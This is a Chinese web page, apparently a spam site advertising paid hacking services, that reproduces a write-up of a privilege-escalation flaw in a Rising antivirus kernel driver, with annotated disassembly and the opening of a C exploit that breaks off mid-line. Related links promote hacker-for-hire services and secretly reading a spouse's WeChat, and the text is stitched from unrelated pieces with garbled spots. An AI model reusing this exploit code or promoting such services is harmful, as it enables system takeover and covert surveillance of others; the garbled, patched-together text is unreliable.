搜黑客接单一般多少钱?真的黑客先办事后付款
近期在发现symtdi权限提升的漏洞的基础上,对瑞星的驱动程序也进行分析,发现也存在问题,由于驱动程序中处理 IRP_MJ_DEVICE_CONTROL例程没有检查用户传入的缓冲区地址的合法性,造成任意内核地址可写的漏洞,用户可以发送恶意的DeviceIoControl的来完全的控制计算机。请看以下汇编片段:; int __stdcall sub_10ABE(int,PIRP Irp).text:00010ABE sub_10ABE proc near ; DATA XREF: start+2Co.text:00010ABE.text:00010ABE Irp = dword ptr 0Ch.text:00010ABE.text:00010ABE push ebp.text:00010ABF mov ebp, esp.text:00010AC1 mov edx, [ebp+Irp].text:00010AC4 push ebx.text:00010AC5 push esi.text:00010AC6 push edi.text:00010AC7 mov edi, [edx+60h] ; 这里为了效率,依然使用METHOD_NEITHER这种方式进行数据传输 .text:00010ACA mov eax, 220023h.text:00010ACF mov ecx, [edi+0Ch].text:00010AD2 cmp ecx, eax.text:00010AD4 ja loc_10C09.text:00010AD4.text:00010ADA jz loc_10BFB.text:00010ADA.text:00010AE0 mov eax, ecx.text:00010AE2 sub eax, 220007h.text:00010AE7 jz loc_10B6D ;这里存在比较严重的问题....... loc_10B6D:; CODE XREF: sub_10ABE+29j.text:00010B6D mov ax, es.text:00010B70 mov word_1329C, ax.text:00010B76 mov ax, ds.text:00010B79 mov word_1329A, ax.text:00010B7F mov ecx, [edi+8] ; 长度.text:00010B82 mov esi, [edi+10h] ; esi = irpSp->Type3InputBuffer.text:00010B85 mov eax, ecx.text:00010B87 mov edi, offset unk_13080 ; 这里也没有检查输入的缓冲区的; 长度,可以对静态数据区进行溢;出, 不过你往下看你会更兴奋.text:00010B8C shr ecx, 2.text:00010B8F rep movsd.text:00010B91 mov ecx, eax.text:00010B93 mov eax, P.text:00010B98 xor ebx, ebx.text:00010B9A and ecx, 3.text:00010B9D cmp eax, ebx.text:00010B9F rep mov *** .text:00010BA1 jz loc_10CA7.text:00010BA1.text:00010BA7 push eax ; Buffer.text:00010BA8 push offset unk_13099 ; FileHandle.text:00010BAD call sub_10414.text:00010BAD.text:00010BB2 test al, al.text:00010BB4 jnz short loc_10BC7.text:00010BB4.text:00010BB6 mov eax, [ebp+Irp].text:00010BB9 mov eax, [eax+3Ch] ; eax = irp->UserBuffer.text:00010BBC mov dword ptr [eax], 1 ; eax所指向的地址被写入了1.text:00010BC2 jmp loc_10CA7 到此我们已经看清楚了这个漏洞的成因,也看到了利用 *** ,和之前的symtdi的利用 *** 基本一样. #include#include #pragma comment (lib, "ntdll.lib") typedef LONG NTSTATUS; #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)#define STATUS_INFO_LENGTH_MI *** ATCH ((NTSTATUS)0xC0000004L) typedef struct _IMAGE_FIXUP_ENTRY { WORD offset:12;WORD type:4;} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY; typedef struct _UNICODE_STRING { USHORT Length;USHORT MaximumLength;PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING; extern "C"NTSTATUSNTAPINtAllocateVirtualMemory(IN HANDLE ProcessHandle,IN OUT PVOID *BaseAddress,IN ULONG ZeroBits,IN OUT PULONG AllocationSize,IN ULONG AllocationType,IN ULONG Protect); int main(int argc, char* argv[]){NTSTATUS status;HANDLE deviceHandle;DWORD dwReturnSize = 0;PVOID VdmControl = NULL;PVOID p = NULL; PVOID ShellCodeMemory = (PVOID)0x1;DWORD MemorySize = 0x1000; PROCESS_INFORMATION pi;STARTUPIN
相关文章
业务系统如何对接第三方服务?
在产物事情中,我们时常要对接第三方处事。本文作者从过往的对接项目经验中,提炼的关于业务系统,如何对接第三方处事的要领论,但愿能对你有所辅佐。 跟着公司业务的成长,我们有时会碰着,需要在自身业务系统中...
3d打印怎么赚钱?买个3d打印机怎么赚钱
假如你购买了一台3D打印机,并进行了完美打印的正确设置,而且你已经打印了一队低聚妙蛙种子。那,接下来做什么? 并非每个人都有时间或精力去学习您所拥有的技能和知识,但他们又对3D打印所带来的好处深感兴...
怎样偷偷接收老公微信(怎样偷偷同步老公微信
相信现在有很多的朋友们对于有房产证的房子倒塌了怎么办有没有规定的呢都想要了解吧,那么今天小编就来给大家针对有房产证的房子倒塌了怎么办有没有规定的呢进行一个介绍吧,希望小编介绍的内容能够为大家起到帮助哦...
大学之间黑客攻击(黑客攻击学校)
本文导读目录: 1、黑客攻击主要有哪些手段? 2、国内高校为何成勒索病毒攻击的"重灾区"? 3、什么是黑客攻击?为什么要攻击?怎么攻击的? 4、清华大学被黑客攻击了?是真的吗? 5、大...
湘乡黑客运(湘乡到湘潭的黑车电话)
本文导读目录: 1、湘乡杀人案受害者曝光更多细节:双方曾有打斗,凶手赶尽杀绝!这怎么回事? 2、为什么广州到湘乡的列车全部停运 3、请问明天湘乡至湘潭客运班车正常营运吗? 4、湘乡到株洲的...
黑客找微信号-手机可以学黑客技术吗(网络黑客技术在哪里可以学)
黑客找微信号相关问题 新手如何用手机学黑客 黑客技术相关问题 黑客应该用什么配置的台式电脑 黑客联盟创始人king的留言(华夏黑客联盟)...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!